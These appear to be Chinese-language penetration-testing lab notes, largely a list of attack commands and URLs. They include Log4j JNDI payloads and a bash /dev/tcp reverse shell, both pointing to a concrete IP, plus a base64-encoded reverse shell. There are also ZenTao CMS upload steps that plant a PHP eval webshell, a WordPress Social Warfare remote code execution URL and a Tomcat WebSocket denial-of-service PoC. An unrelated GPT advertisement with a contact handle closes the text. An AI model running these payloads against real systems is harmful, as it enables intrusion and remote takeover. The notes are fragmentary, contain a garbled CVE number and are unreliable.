实际构造:${jndi:ldap://39.105.154.133:1389/Basic/ReverseShell/39.105.154.133/9090}
——————————
java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 39.105.154.133
${jndi:ldap://39.105.154.133:1389/Basic/ReverseShell/39.105.154.133/9090}
bash -i >& /dev/tcp/39.105.154.133/9999 0>&1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A "39.105.154.133"
rmi://39.105.154.133:1099/qxavqn
${jndi:rmi://39.105.154.133:1099/2kzlcs}
禅道CMS
禅道项目管理软件是国产的开源项目管理软件。 账户密码为admin:123456
禅道CMS文件上传漏洞(CNVD-C-2020-121325)
准备工作
1、在自己的服务器上创建shell.php
内容为<?php phpinfo();?>
2、将shell.php 放到web 服务器可以访问的目录
3、对恶意文件地址进行base64编码
利用poc远程下载文件
http://靶场 ip/zentao/client-download-1
aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA=-1.html
访问shell
http://靶场 ip/zentao/data/client/1/shell.php
ok,拿下。
禅道12.4.2后台管理员权限Getshell - FreeBuf网络安全行业门户
青岛易软天创网络科技有限公司禅道cms存在命令执行漏洞(CNVD-2020-45147)
12.3.2
【CNVD/CVE】CNVD-C-2020-121325-CSDN博客
aHR0cDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw
zentao/client-download-1-aHR0cDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw-1.html
zentao/data/client/1/shell.php
<?php echo "<?php phpinfo();?>";
<?php echo "<?php @eval($_POST[2]);?>";
SFRUUDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw
http://101.36.125.125:20092/zenteo/www/client-download-1-SFRUUDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw.htmlcve-2019-9978
CVE-2919-9978 wordpress social warfare插件RCE | St1_Fn
登录---开启插件---构造利用
http://39.105.154.133:9090/test.txt
http://your-targetIP/wp-admin/admin.php?page=social-warfare&swp_debug=load_options&swp_url=http://you-attack-ip/test.txt
http://101.36.125.125:37769/wp-admin/admin.php?page=social-warfare&swp_debug=load_options&swp_url=http://39.105.154.133:9090/test.txt
猫咪&cve-2020-13935 (题重)
测试POC
https://github.com/RedTeamPentesting/CVE-2020-13935
1. $ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
2. $ cd CVE-2020-13935
3.go env -w GOPROXY=https://goproxy.cn
4. $ go build
5. $ ./tcdos ws://靶场ip/examples/websocket/echoStreamAnnotation
广x
打个广xxx :gpt教程:https://gitee.com/jinhu1/chatgpt-share
加v:kiko_wp ,发你永久免费的GPT授权码。